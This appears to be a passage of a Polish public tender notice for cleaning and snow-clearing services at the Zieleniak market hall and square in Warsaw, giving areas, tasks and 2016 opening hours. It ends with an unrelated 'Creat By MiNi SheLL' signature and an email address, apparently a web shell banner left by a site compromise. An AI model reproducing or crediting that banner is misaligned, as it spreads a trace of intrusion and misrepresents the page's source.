<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rzeczowy zakres usługi - utrzymanie porządku i czystości:
Utrzymanie czystości i sprzątanie targowiska Zieleniak, zlokalizowanego na działkach ew. nr 60 o pow. 5403 m2 i nr 62/1 o pow. 1211 m2 z obrębu 2-03-09, położonych przy ul. Grójeckiej 97 w Warszawie. Na targowisku znajduje się pawilon handlowo usługowy o powierzchni zabudowy 3143 m2 i plac targowy o powierzchni ok. 700.m 2 .
Pawilon handlowy trzykondygnacyjny:
wysokość budynku 8,10 m2,
2 kondygnacje naziemne (pow. użytkowe), parter -2811,00 m2, I piętro -2962,00 m2,
1 kondygnacja garażowa podziemna (pow. użytkowa) - 2853,00 m2
w budynku są trzy klatki schodowe.
Usługa obejmuje w szczególności:
a) utrzymanie czystości i sprzątanie hali targowej na parterze pawilonu handlowo-usługowego,
b) utrzymanie czystości i sprzątanie garażu podziemnego, 
c) utrzymanie czystości i sprzątanie  pomieszczeń administracyjnych  znajdujących się na I piętrze pawilonu handlowo-usługowego,
d) utrzymanie w czystości części wspólnych w pawilonie handlowo-usługowym (ciągów komunikacyjnych, toalet, pomieszczeń socjalnych i gospodarczych, drzwi wewnętrznych i zewnętrznych oraz okien),
e) utrzymanie w czystości placu targowego oraz terenów bezpośrednio przyległych do targowiska,
f) odśnieżanie terenu oraz dachu pawilonu.
Godziny funkcjonowania targowiska:
a) parter pawilonu i plac targowy od poniedziałku do piątku , w godz. od 6.00 do 19.00
w soboty, w godz. od 7.30 do 20.00  w niedzielę nieczynne, za wyjątkiem niedziel handlowych wymienionych w punkcie c,
b) piętro pawilonu od poniedziałku do piątku, w godz. od 10.00 do 22.00,
soboty w godz. od 8.00 do 22.00  w niedzielę nieczynne,
c) w 2016 r. targowisko będzie funkcjonować w dwie tradycyjne handlowe niedziele tj. 20.03.2016 r. i 18.12.2016 r., godz. otwarcia od 7.30 do 20.00.
Administrator obiektu  w uzasadnionych przypadkach może skrócić bądź wydłużyć czas funkcjonowania targowiska.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.70.00.00-6.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com